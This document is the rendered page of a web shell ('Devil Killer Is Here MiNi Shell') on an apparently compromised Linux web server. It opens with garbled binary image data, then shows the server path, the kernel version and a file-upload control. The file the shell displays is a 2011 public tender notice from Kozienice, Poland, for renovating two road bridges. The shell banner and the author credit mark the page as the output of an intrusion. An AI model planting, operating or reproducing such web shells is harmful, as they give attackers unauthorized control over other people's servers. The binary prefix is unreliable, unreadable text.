JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110411/71770-N-2011.html

<p class="kh_header"><b>Kozienice: Przebudowa obiektów mostowych w ciągu dróg gminnych w Nowej Wsi i Wójtostwie</b><br>
<b>Numer ogłoszenia: 71770 - 2011; data zamieszczenia: 11.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa obiektów mostowych w ciągu dróg gminnych w Nowej Wsi i Wójtostwie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest:
-   remont  mostu drogowego przez rzekę Zagożdżonkę, zlokalizowanego w ciągu drogi gminnej w m.   Nowa Wieś, wykonanie dojazdów, odtworzenie nawierzchni drogi dojazdowej do mostu od strony m. Nowa Wieś, stała organizacja ruchu, odpowiedzialność z tytułu użytkowania obiektu w okresie od dnia  odbioru branżowego do dnia odbioru końcowego przedmiotu umowy,
-   remont mostu drogowego na drodze gminnej nr 170531 W w m. Wójtostwo oraz remont dojazdów do  mostu.
Zakres prac obejmuje poprawę stanu technicznego obiektów i dostosowanie ich do potrzeb  komunikacyjnych poprzez wykonanie: 
.	dla obiektu mostowego w m. Nowa Wieś: robót rozbiórkowych, wbicie pali drewnianych, wykonanie drewnianego jarzma podpór, montaż łożysk stalowych, montaż rusztu stalowego ustroju niosącego, ułożenie poprzecznic, ułożenie podkładu dolnego, ułożenie podkładu górnego, ułożenie opaski ochronnej, wykonanie oporęczowania mostu,  wykonanie ścianek żwirowych przyczółków, wykonanie obustronnych dojazdów do mostu,  odtworzenie nawierzchni drogi dojazdowej do mostu od strony m. Nowa Wieś, wykonanie docelowej organizacji ruchu, odpowiedzialność z tytułu użytkowania obiektu w okresie od dnia odbioru branżowego do dnia odbioru końcowego przedmiotu umowy wynikające z wad jakościowych. Wykonawca w ramach zadania dokona zakupu, dostawy i montażu wszystkich elementów wyposażenia oraz do odbioru branżowego robót z uzyskaniem protokołu dopuszczającego obiekt do ruchu i odbioru końcowego przedmiotu umowy.

.	dla obiektu mostowego w m. Wójtostwo: wymiana belek typu Gromnik, naprawa elementów betonowych podpór, ustawienie krawężników mostowych, wykonanie odwodnienia, wykonanie kap podchodnikowych, wykonanie nawierzchni na moście, naprawa przyczółków, umocnienie stożków nasypów, remont dojazdów do mostu. Wykonawca w ramach zadania dokona zakupu, dostawy i montażu wszystkich elementów wyposażenia oraz do odbioru branżowego robót  i odbioru końcowego przedmiotu umowy
Zakres rzeczowy obejmuje w szczególności:  
dla obiektu mostowego w m. Nowa Wieś:
- remont mostu:
-	roboty rozbiórkowe: rozbiórka mostu, 
-	roboty ziemne: wykopy, zasypywanie wnęk za ścianami budowli wodno-inżynieryjnych, ręczne zagęszczenie gruntu w korycie i na poszerzeniach, 
-	wbijanie pali drewnianych , 
-	wykonanie i montaż konstrukcji jarzma,
-	wykonanie i montaż łożysk mostowych,
-	wykonanie i montaż dźwigarów głównych stalowych ze stężeniami stalowymi z częściowym wykorzystaniem  istniejących,
-	montaż stężeń poprzecznych stalowych,
-	wbudowanie ustrojó niosących mostu,
-	wykonanie izolacji papą,
-	wykonanie izolacji przeciwwilgociowej powłokowej,
-	oczyszczenie ręczne i   malowanie konstrukcji stalowej, 
-	czyszczenie i malowanie istniejących pali stalowych,
-	ułożenie drewnianej jezdni mostu z dali,
-	ułożenie krawężniak mostu,
-	wbudowanie poręczy mostu drewnianego ze słupkami i wypełnieniem ażurowym,
- wykonanie dojazdów do mostu:
-	wbudowanie ziemi w nasyp,
-	mechaniczne wykonanie koryta i warstwy odsączającej na szerokości jezdni i chodników,
-	podbudowa z kruszywa naturalnego jezdni i chodników,
-	betonowanie płyty, ław i ciosów podłożyskowych,
-	nawierzchnia z tłucznia kamiennego,
- stałą organizację ruchu,
- odtworzenie nawierzchni drogi dojazdowej do mostu od strony m. Nowa Wieś,
- odpowiedzialność z tytułu użytkowania obiektu w okresie od dnia odbioru branżowego do dnia odbioru 
  końcowego przedmiotu umowy wynikające z wad jakościowych,
-wykonanie prac związanych z przygotowaniem obiektu przed ostatecznym odbiorem,

dla obiektu mostowego w m. Wójtostwo:
- prace rozbiórkowe:
-     wycinkę 3 wierzb,
-     demontaż poręcz -balustrady i prefabrykatów na poboczach ,
-     wycięcie pozostałych pali do poziomu dna rzeki,
-     rozbiórkę nawierzchni i płyty nadbetonu pomostu i nawierzchni dojazdów do mostu,
-     demontaż belek L = 9m,
-     częściowa rozbiórka korony przyczółków  ,
-     oczyszczenie korpusów przyczółków oraz skrzydeł, 
- prace montażowe:
-    uzupełnienie nierówności  przyczółków  oraz wykonanie żelbetowych ław podłożyskowych  
     wraz ze ścianką żwirową
-    wykonanie izolacji z papy termozgrzewalnej,
-    montaż belek mostowych prefabrykowanych dług. L= 9m,
-    wykonanie zbrojenia płyty nadbetonu,
-    wykonanie nadbetonu płyty pomostu,
-    wykonanie izolacji przeciwilgociowej z papy termozgrzewalnej,
-    montaż sączków mostowych,
-    ustawienie krawężników,
-    wykonanie kap podchodnikowych i belki podporęczowej,
-    wykonanie wspornika skrzydełek,
-    naprawa balustrady mostowej, w tym czyszczenie do stopnia czystości St2, malowanie,
-    montaż przęseł balustrady mostowej,
-    wykonanie płyt przejściowych,
-    ułożenie warstw stabilizowanych za przyczółkami,
-    ustawienie krawężników,
-    ułożenie podbudowy tłuczniowej na zjeździe drogi,
-    wykonanie opasek z kostki brukowej na dojazdach,
-    skropienie emulsją warstw konstrukcyjnych,
-    ułożenie asfaltobetonu na zjazdach i moście,
-    wykonanie uszczelnień,
-    wykonanie izolacji z żywic poliuretanowych,
-    uzupełnienie ubytków w powierzchni przyczółków,
-    wykonanie zabezpieczenia powierzchniowego elementów betonowych,
-    naprawa ubytków w skarpie,
-    wykonanie umocnienia brzegów stożków nasypów,
- remont dojazdów do mostu,
oraz dla obu obiektów mostowych
- oczyszczenie koryta rzeki w obrębie mostu,
- kompleksową obsługę geodezyjną zachowując postanowienia  Roz.M.G.P.iB. z dn.21.02.1995r Dz. U. nr 25 poz.133 -w sprawie  rodzaju i zakresu  opracowań   geodezyjno-kartograficznych oraz czynności geodezyjnych   obowiązujących  w  budownictwie, w tym czynności geodezyjne obowiązujące w budownictwie, w tym:
-  prace    przygotowawcze   -   pomiary    uzupełniające   konieczne   do  realizacji   zadania,    
   domiary sytuacyjne, uściślenie  rzędnych wysokościowych ,
-  prace  pomiarowe  poparte  wpisami  w  dzienniku  budowy - wytyczenie  w  terenie  i   
   utrwalenie na gruncie  w  terminie  7  dni  od dnia przekazania  placu budowy potwierdzonego   
   wpisem w dzienniku  budowy   przebiegu   lokalizacji   obiektu  w szczególności:
¨	główne osie obiektu,
¨	charakterystyczne punkty,
¨	stałe punkty wysokościowe,
¨	brakujące uzupełnienia geodezyjne,
-	uczestniczenie w przekazaniu placu budowy i  odbiorach robót, w tym częściowych, końcowym, gwarancyjnych i pogwarancajnych,
-	bieżąca obsługa geodezyjna budowy, na każde żądanie Wykonawcy robót - pomiary realizacyjne, bilansy robót ,
-	na żądanie wykonawcy i inwestora kontrolne pomiary elementów inwestycji, w tym  przemieszczeń i odkształceń obiektów w terminach uzgodnionych z wykonawcą i zamawiającym,
-	potwierdzenie wpisem do dziennika budowy wykonania czynności geodezyjnych,
-	przekazanie kopii szkiców tyczenia i kontroli położenia elementów inwestycji, zawierające dane geodezyjne umożliwiające wznowienie lub kontrolę wyznaczenia - Zamawiającemu, Wykonawcy i Inspektorowi Nadzoru,
-	geodezyjna inwentaryzacja powykonawcza elementów inwestycji, wraz z podziałem szczegółowym na  rodzaj robót, średnice i ilości wykonanych robot w podziale na branże - wg wymagań inspektora nadzoru lub Zamawiającego,
-	powykonawcza dokumentacja geodezyjno - kartograficzna obiektów w formie i zakresie przewidzianym  wymaganymi przepisami obowiązującymi na dzień  odbioru zadania,
-	przekazanie zamawiającemu 5 kompletów  kopii mapy powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej zarejestrowanej w Starostwie wraz z wykazem określającym  ilości wykonanych robót z podziałem na branże, rodzaje robót, średnice, 
-	współpraca z pozostałymi uczestnikami procesu budowlanego w tym z wykonawcą w zakresie przygotowania powykonawczej dokumentacji geodezyjnej dla zadania ,
-	wykonanie czynności geodezyjnych w okresie rękojmi i gwarancji dla robót budowlanych,
-	dyspozycyjność, w tym poprzez kontakt telefonii komórkowej,
- wykonanie robót pomocniczych, w tym:
.	konserwacja wbudowanych elementów zgodnie z zaleceniami producenta w okresie  rękojmi i gwarancji -szczegółowe warunki  określa załącznik nr 2 do umowy,
.	nieodpłatne przeglądy i usuwanie uszkodzeń wynikających z wad produkcyjnych lub zastosowania wadliwych materiałów,
.	poniesienie kosztów związanych z oznakowaniem terenu budowy zgodnym z przepisami, 
.	opracowanie projektów organizacji ruchu na czas prowadzenia robót wraz z uzyskaniem wymaganych  zezwoleń, poniesienie kosztów związanych z zajęciem pasa drogowwgo oraz oznakowaniem ich na czas prowadzenia robót zgodnym z przepisami,
.	wywózka materiałów odpadowych -gruzu, gałęzi, karpin, dłużyc oraz innych, pochodzących z placu budowy  i ich utylizacja, 
.	wykonanie przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót,
.	przejęcie na siebie odpowiedzialności za szkody wobec osób trzecich w  związku z prowadzonymi robotami, 
.	powiadomienie z 2 tygodniowym wyprzedzeniem sołtysów wsi sąsiadujących z obiektami mostowymi w tym Nowej Wsi, Świerży Górnych, Kępy Bielańskiej, Holendrów Kuźmińskich, Wójtostwa, Dąbrówek, Holendrów Kozienieckich  o terminie prowadzenia robót i ewentualnych niedogodnościach z nimi zwiazanych -kopię powiadomień należy przekazać Zamawiającemu,
.	uporządkowanie terenu bezpośrednio przylegającego do placu budowy,
- wymagane przez obowiązujące przepisy próby, badania, pomiary.

Zakres robót został szczegółowo określony w załączonym do siwz załączniku nr 9,10,11..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających  o których mowa  w art. 67 ust. 1 pkt. 6 ustawy Pzp do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.10-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty budowlane polegające na budowie lub przebudowie lub remoncie co najmniej 1 obiektu mostowego, o całkowitej długości mostu nie mniejszej niż 12m  i załączy dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
UWAGA: Zamawiający nie dopuszcza sumowania mniejszych zamówień wykonanych przez Wykonawców wspólnie ubiegających się o zamówienie. 
Ocena spełnienia ww warunków dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że ww warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje w okresie przewidzianym na realizację zamówienia co najmniej 1 osobą która będzie pełnić funkcję kierownika budowy , posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności mostowej bez ograniczeń w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane - Dz.U. z 2006r. Nr 156, poz. 1118 ze zm. lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Ocena spełnienia ww warunków dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że ww warunki wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- w przypadku gdy wykonawca będzie polegał na wiedzy, doświadczeniu i osobach zdolnych do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp- w takiej sytuacji zobowiązany jest przedłożyć pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia np. wg wzoru - załącznik nr 7 do siwz lub inny równoważny dokument zawierający zakres określony w pkt. 8.1.2.1.siwz
-stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
- w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
1.Terminu wykonania zadania w następujących przypadkach :
1.1.Niesprzyjających warunków  pogodowych.
1.2.Niedopełnieniu przez Zamawiającego jego obowiązków wynikających 
              z umowy.
1.3.Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu 
      zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te  
      zmiany są korzystne dla Zamawiającego.
1.4.Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed  
              zawarciem umowy przez doświadczonego wykonawcę, robót.
1.5.Z powodu okoliczności siły wyższej, np. wystapienia zdarzenia losowego 
              wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub grożącego powstaniem szkody w znacznych rozmiarach.
1.6.Z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu 
              uchylenia bezpośredniego niebezpieczeństwa grożącego dobru społecznemu lub jakiemukolwiek dobru jednostki,
1.7.Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to 
              działania nie są konsekwencją winy którejkolwiek ze stron.
1.8.Zawieszenie wykonania prac nie spowodowanych uchybieniami Wykonawcy,
2.W przypadku zaistnienia potrzeby zmiany rozwiązań technicznych gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego w projekcie,
3.Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu,
4.W przypadku zaistnienia uzasadnionej potrzeby zmiany podwykonawcy. 
Jeżeli wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy, zmiana podwykonawcy możliwa jest pod warunkiem gdy nowy podwykonawca wykaże spełnianie warunków udziału w postępowaniu w zakresie wskazanym na etapie postępowania o zamówienie publiczne, przedkładając wymagane dokumenty. 
5.Gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku  akcyzowego.
6.Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, w 
                                       szczególności na jej zakres,termin.
7.Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2011 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, 26-900 Kozienice, ul. Parkowa 5, pok. nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com